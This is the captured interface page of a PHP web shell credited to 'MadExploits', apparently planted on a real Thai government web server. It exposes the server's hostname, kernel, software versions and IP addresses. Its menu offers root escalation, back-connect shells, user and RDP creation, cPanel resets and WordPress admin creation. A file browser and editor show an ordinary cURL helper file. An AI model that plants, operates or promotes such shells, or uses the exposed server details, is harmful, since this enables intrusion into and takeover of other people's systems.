Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
idocument /
tcpdf /
class /
[ HOME SHELL ]
Name
Size
Permission
Action
Table.class.php
4.71
KB
-rw-r--r--
class_curl.php
1.06
KB
-rw-r--r--
simple_html_dom.php
53.6
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class_curl.php
<?php function curl_get($url){ $ch = curl_init(); // create cURL handle (ch) if (!$ch) { die("Couldn't initialize a cURL handle"); } // set some cURL options $ret = curl_setopt($ch, CURLOPT_URL,$url); //$ret = curl_setopt($ch, CURLOPT_HEADER,0); //$ret = curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); $ret = curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $ret = curl_setopt($ch, CURLOPT_TIMEOUT,30); // execute $ret = curl_exec($ch); if (empty($ret)) { // some kind of an error happened die(curl_error($ch)); curl_close($ch); // close cURL handler } else { $info = curl_getinfo($ch); curl_close($ch); // close cURL handler if (empty($info['http_code'])) { die("No HTTP code was returned"); } else { // load the HTTP codes // $http_codes = parse_ini_file("path/to/the/ini/file/I/pasted/above"); // // // echo results // echo "The server responded: <br />"; // echo $info['http_code'] . " " . $http_codes[$info['http_code']]; } } return $ret; } ?>
Close